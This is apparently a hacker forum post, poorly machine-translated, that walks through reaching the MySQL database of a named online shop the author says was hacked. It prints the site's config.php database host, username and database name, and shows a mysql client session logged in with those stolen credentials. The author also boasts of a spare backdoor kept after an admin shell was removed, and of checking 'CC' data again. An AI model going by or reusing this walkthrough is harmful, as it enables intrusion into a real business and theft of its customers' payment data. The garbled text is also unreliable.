How to remote
MSQL Database on Linux Console .... If I was able to
Hacked site. do not forget certain config files
I save the database Uh .. anyone know
we caught admin shell continues deleted ..
So we still have a spare .. ngahaha ...
Know who the next month or next year when
We've checked it was updates CC again lol
Ok .. First the need to provide SSH account, the user can also ...
The point's already msqlnya version 4 or 5 will be out confirmation
see below
root @ noc1: / home / noc-HQ # apt-get install mysql-client-5.0
example of my config file:
This config file (config.php)
$ http://www.punchwithjudy.com.au/shop sql_dns = ';
$ sql_host = 'caelum.netregistry.net';
$ sql_user = 'myxcar1284';
$ sql_db = 'xcart_punchwithjudy_com_au';
$ sql_password = 'Secret :p';
root@hacking ~]# mysql -h caelum.netregistry.net -u myxcar1284 -p
xcart_punchwithjudy_com_au
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 61477463 to server version: 4.1.22-standard
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> help
For information about MySQL products and services, visit:
http://www.mysql.com/
For developer information, including the MySQL Reference Manual, visit:
http://dev.mysql.com/
To buy MySQL Network Support, training, or other products, visit:
https://shop.mysql.com/
List of all MySQL commands:
Note that all text commands must be first on line and end with ';'
? (\?) Synonym for `help'.
clear (\c) Clear command.
connect (\r) Reconnect to the server. Optional arguments are db and host.
delimiter (\d) Set statement delimiter. NOTE: Takes the
rest of the line as new delimiter.
edit (\e) Edit command with $EDITOR.
ego (\G) Send command to mysql server, display result vertically.
exit (\q) Exit mysql. Same as quit.
go (\g) Send command to mysql server.
help (\h) Display this help.
nopager (\n) Disable pager, print to stdout.
notee (\t) Don't write into outfile.
pager (\P) Set PAGER [to_pager]. Print the query results via PAGER.
print (\p) Print current command.
prompt (\R) Change your mysql prompt.
quit (\q) Quit mysql.
rehash (\#) Rebuild completion hash.
source (\.) Execute an SQL script file. Takes a file name as an argument.
status (\s) Get status information from the server.
system (\!) Execute a system shell command.
tee (\T) Set outfile [to_outfile]. Append everything into given outfile.
use (\u) Use another database. Takes database name as argument.
charset (\C) Switch to another charset. Might be
needed for processing binlog
with multi-byte charsets.
warnings (\W) Show warnings after every statement.
nowarning (\w) Don't show warnings after every statement.
For server side help, type 'help contents'
mysql> status
--------------
mysql Ver 14.12 Distrib 5.0.27, for redhat-linux-gnu (i686)
using readline 5.0
Connection id: 61477463
Current database: xcart_punchwithjudy_com_au
Current user: myxcar1284@64.136.60.193
SSL: Not in use
Current pager: stdout
Using outfile: ''
using delimiter: ;
Server version: 4.1.22-standard
Protocol version: 10
Connection: caelum.netregistry.net via TCP/IP
Server characterset: latin1
Db characterset: latin1
Client characterset: latin1
Conn. characterset: latin1
TCP port: 3306
Uptime: 76 days 13 hours 22 min 57 sec
Threads: 73 Questions: 2308234562
Slow queries: 75666
Opens: 5898321 Flush tables: 1
Open tables: 9999 Queries per second avg: 348.962
see further instructions on
command help ...: P
gud luck: D